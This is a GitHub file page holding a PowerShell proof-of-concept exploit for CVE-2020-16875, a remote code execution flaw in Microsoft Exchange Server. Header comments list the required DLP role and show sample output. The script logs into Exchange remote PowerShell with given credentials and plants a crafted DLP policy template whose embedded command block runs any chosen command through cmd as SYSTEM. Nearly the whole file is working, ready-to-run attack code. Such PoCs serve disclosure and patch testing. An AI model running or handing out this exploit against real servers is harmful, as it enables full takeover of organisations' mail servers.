-
Notifications
You must be signed in to change notification settings - Fork 109
/
Copy pathcve-2020-16875.ps1
115 lines (109 loc) · 4.76 KB
/
cve-2020-16875.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
# Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability
# Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16875
#
# Notes:
#
# The (ab)user needs the "Data Loss Prevention" role assigned
# [PS] C:\Windows\system32>New-RoleGroup -Name "dlp users" -Roles "Data Loss Prevention" -Members "harrym"
#
# Name AssignedRoles RoleAssignments ManagedBy
# ---- ------------- --------------- ---------
# dlp users {Data Loss Prevention} {Data Loss Prevention-dlp users} {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}
#
#
# [PS] C:\Windows\system32>Get-RoleGroup "dlp users" | Format-List
#
# RunspaceId : 098e1140-30e3-4144-8028-2174fdb43b85
# ManagedBy : {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}
# RoleAssignments : {Data Loss Prevention-dlp users}
# Roles : {Data Loss Prevention}
# DisplayName :
# ExternalDirectoryObjectId :
# Members : {exchangedemo.com/Users/Harry Mull}
# SamAccountName : dlp users
# Description :
# RoleGroupType : Standard
# LinkedGroup :
# Capabilities : {}
# LinkedPartnerGroupId :
# LinkedPartnerOrganizationId :
# Identity : exchangedemo.com/Microsoft Exchange Security Groups/dlp users
# IsValid : True
# ExchangeVersion : 0.10 (14.0.100.0)
# Name : dlp users
# DistinguishedName : CN=dlp users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=com
# Guid : fa5c8458-8255-4ffd-b128-2a66bf9dbfd6
# ObjectCategory : exchangedemo.com/Configuration/Schema/Group
# ObjectClass : {top, group}
# WhenChanged : 6/12/2020 11:29:31 PM
# WhenCreated : 6/12/2020 11:29:31 PM
# WhenChangedUTC : 6/12/2020 3:29:31 PM
# WhenCreatedUTC : 6/12/2020 3:29:31 PM
# OrganizationId :
# Id : exchangedemo.com/Microsoft Exchange Security Groups/dlp users
# OriginatingServer : DEAD01.exchangedemo.com
# ObjectState : Changed
#
# Example:
#
# PS C:\Users\researcher> .\poc.ps1 -server WIN-0K4AOM2JIN6.exchangedemo.com -usr [email protected] -pwd user123### -cmd mspaint
# (+) targeting WIN-0K4AOM2JIN6.exchangedemo.com with [email protected]:user123###
# (+) executed mspaint as SYSTEM!
# PS C:\Users\researcher>
param (
[Parameter(Mandatory=$true)][string]$server,
[Parameter(Mandatory=$true)][string]$usr,
[Parameter(Mandatory=$true)][string]$pwd,
[string]$cmd = "mspaint"
)
Function Get-RandomAlphanumericString {
[CmdletBinding()]
Param (
[int] $length = 8
)
Process{
Write-Output ( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count $length | % {[char]$_}) )
}
}
function Exploit-Exchange {
Param (
[string] $server,
[string] $usr,
[string] $pwd,
[string] $cmd
)
"(+) targeting $server with ${usr}:$pwd"
$securepwd = ConvertTo-SecureString $pwd -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ($usr, $securepwd)
$s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://$server/PowerShell/ -Authentication Kerberos -Credential $creds
$xml = @"
<dlpPolicyTemplates>
<dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0">
<contentVersion>4</contentVersion>
<publisherName>si</publisherName>
<name>
<localizedString lang="en"></localizedString>
</name>
<description>
<localizedString lang="en"></localizedString>
</description>
<keywords></keywords>
<ruleParameters></ruleParameters>
<policyCommands>
<commandBlock>
<![CDATA[ `$i=New-object System.Diagnostics.ProcessStartInfo;`$i.UseShellExecute=`$true;`$i.FileName="cmd";`$i.Arguments="/c $cmd";`$r=New-Object System.Diagnostics.Process;`$r.StartInfo=`$i;`$r.Start() ]]>
</commandBlock>
</policyCommands>
<policyCommandsResources></policyCommandsResources>
</dlpPolicyTemplate>
</dlpPolicyTemplates>
"@
$n = Get-RandomAlphanumericString
[Byte[]]$d = [System.Text.Encoding]::UTF8.GetBytes($xml)
Invoke-Command -Session $s -ScriptBlock {
New-DlpPolicy -Name $Using:n -TemplateData $Using:d
} | Out-Null
"(+) executed $cmd as SYSTEM!"
}
Get-PSSession | Remove-PSSession
Exploit-Exchange -server $server -usr $usr -pwd $pwd -cmd $cmd